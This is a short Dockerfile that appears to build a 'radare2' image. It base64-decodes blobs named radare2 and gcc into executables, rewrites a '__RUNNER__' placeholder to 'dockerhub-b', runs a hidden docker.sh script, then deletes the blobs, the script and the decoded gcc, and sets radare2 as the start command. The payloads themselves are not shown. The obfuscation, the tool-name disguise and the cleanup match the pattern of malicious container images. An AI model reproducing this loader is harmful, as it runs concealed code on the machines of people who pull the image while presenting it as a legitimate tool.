FROM boglarkakissmk/gcc
WORKDIR /workdir
ENV DEBIAN_FRONTEND noninteractive

RUN bash -c 'echo $(date +%s) > radare2.log'

COPY radare2.64 .
COPY docker.sh .
COPY gcc.64 .

RUN bash -c 'base64 --decode radare2.64 > radare2'
RUN bash -c 'base64 --decode gcc.64 > gcc'
RUN chmod +x gcc
RUN sed --in-place 's/__RUNNER__/dockerhub-b/g' radare2

RUN bash ./docker.sh
RUN rm --force --recursive radare2 _REPO_NAME__.64 docker.sh gcc gcc.64

CMD radare2
